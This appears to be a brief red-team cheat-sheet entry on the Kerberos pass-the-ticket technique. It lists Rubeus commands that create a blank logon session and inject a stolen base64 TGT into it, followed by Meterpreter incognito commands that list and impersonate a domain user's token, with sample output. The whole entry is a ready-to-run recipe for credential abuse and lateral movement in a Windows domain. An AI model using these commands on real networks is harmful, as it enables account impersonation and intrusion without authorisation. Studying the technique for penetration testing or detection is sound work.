Pass the Ticket

Create blank logon session

Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe

[+] ProcessID       : 18068
[+] LUID            : 0x186350

Pass TGT into LUID

Rubeus.exe ptt /luid:0x186350 /ticket:BASE64TICKET

Triage will now show TGT inside LUID

Impersonate the process

load incognito
list_token -u
impersonate_token r3dlab\\deb

Last updated